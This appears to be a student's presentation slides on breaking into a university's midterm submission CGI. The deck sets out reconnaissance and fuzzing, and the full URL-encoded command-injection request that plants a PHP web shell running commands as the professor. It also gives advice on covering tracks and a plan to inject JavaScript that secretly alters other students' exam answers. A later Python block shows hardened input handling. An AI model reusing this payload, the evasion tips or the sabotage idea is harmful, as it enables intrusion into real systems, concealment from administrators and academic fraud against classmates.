About Me
UCCS – B.S. Computer Engineering ’05
UCCS – M.E.I.A. ever since
Just need to finish project :(
iCTF (International Cyber War Games) – going on 4th year with UCCS
The MITRE Corporation
Beautiful girlfriend Kelly
Interests in RE, etc.
Intro
Actually hacked the review; assume the actual test is just like the review
No source code; locked down
Already have read access to most things (shell access): other people’s midterms, etc., misc auth files
Do we even need to hack it? Maybe …
What’s our goal?
http://cs.uccs.edu/~cs502/CS502M2008midterm.html
How does the midterm work? Fill out the form and press Submit
Username, password, answers
Form checks credentials, saves the midterm to disk, emails the midterm to Dr. Chow and the user
The Midterm
On Submit
Echoes out everything submitted, and at the bottom of the screen…
name=exam, value=CS502M2008midterm
class=CS502, year=2008, semester=M2008 term=midterm
open filename=CS502M2008Grade.txt login incorrect!
What we do know
Form is .cgi, probably Perl
Form checks authentication in the file CS502S2008Grade.txt:
/users/server/faculty/chow/public_html/cgi-bin/grade/CS502S2008Grade.txt
Said so (in fewer words) on the web page
Assumptions: potentially grepping the username file for valid credentials; probably using Perl’s open command
What we do know (cont.)
Exams are saved here: .../public_html/cgi-bin/grade/CS502/CS502M2008midterm/
Exams are saved in the format: exam_username_108_7_date
First Thought
Probably doesn’t check input values from CS502S2008Grade.txt – why would you, it’s trusted?
Exploit the trusted: if we could change a username in there, we might be able to exploit unchecked variables
If a file is echoed out with unchecked names, we could execute arbitrary system commands
Finding out more
Just hitting Submit (empty exam) posts the following:
exam=CS502M2008midterm&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
Why does it send CS502M2008midterm? Probably written to be generic
Returns:
name=exam, value=CS502M2008midterm class=CS502, year=2008, semester=M2008 term=midterm open filename=CS502M2008Grade.txt login incorrect!
Modifying Requests
Empty exam, including CS502M2008midterm:
exam=CS502M2008midterm&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
Sending no exam parameter: change to exam=&name=&login=…
Returns:
name=exam, value= class=, year=, semester= term= open filename=Grade.txt login incorrect!
Modifying Requests (cont.)
Send the following (fuzzing):
exam=abcdefghicjklmnopqrstuvwxyz&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
Returns:
name=exam, value=abcdefghicjklmnopqrstuvwxyz class=abcde, year=ghic, semester=fghic term=jklmnopqrstuvwxyz open filename=abcdefghicGrade.txt login incorrect!
Assumptions
The first 10 letters of exam are appended to Grade.txt (the authentication file)
10 letters is not a lot to work with
Probably does a split of exam[1..10] + Grade.txt
*Grade.txt
First thought: try to change the location of Grade.txt. If we control it, we potentially control unchecked input
Assumptions
Probably issuing the following command: open “~chow/…/” + $10char + Grade.txt
This would prevent using /tmp (e.g. /tmp/abcGrade.txt) because of the leading file path
This may be an avenue, but I found another solution so stopped pursuing this
Split Exam Input Value into Two Parameters
The exam value appears somewhere else:
../public_html/cgi-bin/grade/CS502/CS502M2008midterm/*exams
The first 10 characters, CS502M2008, are appended to Grade.txt: CS502M2008Grade.txt
Why do we upload the entire string CS502M2008midterm???
CS502M2008midterm
Since CS502M2008 is used for authentication, we should leave this alone
Let’s modify midterm and see what it does… Change exam=CS502M2008midterm to exam=CS502M2008blah
Unauthenticated, it creates a directory:
../public_html/cgi-bin/grade/CS502/CS502M2008blah
Authenticated, it creates the directory CS502M2008blah, writes out the exam and then emails it
Don’t think I actually ever did this authenticated
If Authenticated
If the folder for this midterm doesn’t exist, create it
Upload the exam to the folder
Email out a copy to Dr. Chow and me
Assumptions
Code maybe calls mkdir or uses Perl to create the directory
Probably uses Perl to write out the file
Probably not writing socket code to do an SMTP call
Email Out
How does this work?
Email Out
Probably something like this:
exec( mail -s exam [email protected] [email protected] < $dir_to_exam/$exam )
Probably doesn’t check $dir_to_exam – why would a directory name contain malicious content?
Can’t change $exam ($exam ~= $user_name), and we can’t change $user_name without modifying *Grade.txt
But we can modify $dir_to_exam!!!! Our fuzzing even showed it could be any length
Authenticated vs. Unauthenticated
Regardless of authentication, a directory is created
Creating directories doesn’t do very much for us
Only if authenticated will it run the mail program command
Execute My Command
Modify the following:
exam=CS502M2008midterm&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
To:
exam=CS502M2008COMMAND&login=_LOGIN_&passwd=_PASSWD_
Note: if we don’t log in correctly, the mail program won’t get executed
By keeping CS502M2008, the system will use CS502M2008Grade.txt to authenticate us
We (I) have (had) a username in this file
New Request
Need help encoding URLs: http://www.w3schools.com/TAGS/ref_urlencode.asp
Let’s upload the following command: & echo "<?php exec(\$_GET['command']); ?>" > a.php &
URL-encoded: %26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26
Full request:
exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&passwd=111-22-3333
Last Request
exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&passwd=111-22-3333
Creates a directory called: CS502M2008& echo "<?php exec(\$_GET['command']); ?>" > a.php &
Mail Program
Assumption:
exec( mail -s exam [email protected] [email protected] < $dir_to_exam/$exam )
Is now turned into:
exec( mail -s exam [email protected] [email protected] < & echo "<?php exec(\$_GET['command']); ?>" > a.php & /$exam )
Successfully creates …/grade/a.php, which takes commands and runs them as Dr. Chow
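To make the two assumptions above concrete (the fixed-offset split of the exam parameter observed while fuzzing, and the mail command assembled as a shell string), here is an added Python example of what a hardened handler would do; it is not code from the slides or from the actual CGI. It reproduces the observed split, rejects any exam value outside a strict character class, confines the exam path to the grade directory, and hands mail(1) an argument vector rather than a shell string. The recipient addresses and the username are constructed placeholders; the exam root is the path quoted on the page.

```python
import os
import re

# Constructed placeholders: the page redacts the real recipient addresses.
RECIPIENTS = ["instructor@example.edu", "student@example.edu"]
# Directory quoted on the page; the real CGI's layout beneath it is assumed.
EXAM_ROOT = "/users/server/faculty/chow/public_html/cgi-bin/grade"

# Letters, digits and underscore only: no shell metacharacters, no path separators.
SAFE_NAME = re.compile(r"[A-Za-z0-9_]+")


def parse_exam(exam: str) -> dict:
    """Split exam the way the fuzzing output on the page implies.

    exam=abcdefghicjklmnopqrstuvwxyz gave class=abcde, semester=fghic, year=ghic,
    term=jklmnopqrstuvwxyz and filename=abcdefghicGrade.txt, i.e. fixed-offset
    slices, with the first 10 characters also naming the credentials file.
    """
    return {
        "class": exam[0:5],
        "semester": exam[5:10],
        "year": exam[6:10],
        "term": exam[10:],
        "grade_file": exam[0:10] + "Grade.txt",
    }


def is_safe_name(value: str) -> bool:
    """True only for a plain identifier; '& echo ... > a.php &' fails here."""
    return SAFE_NAME.fullmatch(value) is not None


def build_mail_argv(exam: str, username: str) -> tuple[list[str], str]:
    """Return the argv for mail(1) plus the exam file to feed it on stdin.

    Because argv is executed without a shell (subprocess.run(argv, stdin=fh)),
    a '&' or '>' inside the directory name can never become a second command.
    The resolved path is also required to stay under EXAM_ROOT.
    """
    if not is_safe_name(exam) or len(exam) <= 10 or not is_safe_name(username):
        raise ValueError("exam or username contains unexpected characters")
    fields = parse_exam(exam)
    root = os.path.realpath(EXAM_ROOT)
    exam_dir = os.path.join(root, fields["class"], exam)  # e.g. .../CS502/CS502M2008midterm
    exam_path = os.path.realpath(os.path.join(exam_dir, f"exam_{username}"))
    if not exam_path.startswith(root + os.sep):
        raise ValueError("exam path escapes the grade directory")
    return ["mail", "-s", "exam", *RECIPIENTS], exam_path
```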
Conclusions
Consequently, this hack appears to never send out an email – Dr. Chow is never notified that it was hacked. Or does it? It doesn’t, verified.
Logs usually only show GETs, not POSTs
Clean up the directories we’ve created and we’ve covered our tracks
Using a.php to upload commands uses GETs, so everything is probably logged there; can easily change this to POSTs
Probably a wise idea to secure anything that remotely looks like a production system
Backups
Evil Things to Do
The average test may take ~30+ minutes
Inject JS that, every 5–10 minutes, picks a multiple-choice question and changes the answer
Slow enough that people may not notice the change
If the user prints out a copy, the hard copy will be wrong too
Goal: lower everyone else’s test scores by some reasonable amount to put yourself at the top of the curve
IDS
An IDS probably could not have stopped this, at least not initially
This is a security test, so answers that would normally be acceptable might get thrown away by an IDS, e.g. “how would you hack this site”